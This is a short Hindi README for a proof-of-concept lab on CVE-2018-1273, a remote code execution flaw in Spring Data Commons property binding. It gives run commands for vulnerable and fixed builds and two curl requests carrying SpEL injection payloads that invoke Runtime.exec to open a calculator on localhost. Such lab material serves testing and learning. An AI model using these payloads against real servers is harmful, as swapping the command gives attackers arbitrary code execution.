
CVE-2018-1273 के लिए POC
Spring Data Commons, संस्करण 1.13 से 1.13.10, 2.0 से 2.0.5, और पुराने असमर्थित संस्करणों में एक प्रॉपर्टी बाइंडर भेद्यता है जो विशेष तत्वों के अनुचित न्यूट्रलाइजेशन के कारण होती है। एक अप्रमाणित दूरस्थ दुर्भावनापूर्ण उपयोगकर्ता (या हमलावर) Spring Data REST द्वारा समर्थित HTTP संसाधनों के विरुद्ध विशेष रूप से तैयार किए गए अनुरोध पैरामीटर प्रदान कर सकता है या Spring Data के प्रोजेक्शन-आधारित अनुरोध पेलोड बाइंडिंग का उपयोग कर सकता है, जो दूरस्थ कोड निष्पादन हमले का कारण बन सकता है।
अधिक जानकारी यहाँ
एप्लिकेशन को Spring Data Commons के असुरक्षित संस्करण या सुरक्षित संस्करण के साथ परीक्षण किया जा सकता है।
mvn spring-boot:run
mvn spring-boot:run -Dfixed
यह जाँचने के लिए निम्नलिखित कमांड चलाएँ कि क्या भेद्यता का शोषण किया जा सकता है:
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"
द्वारा बनाया गया https://www.arima.eu
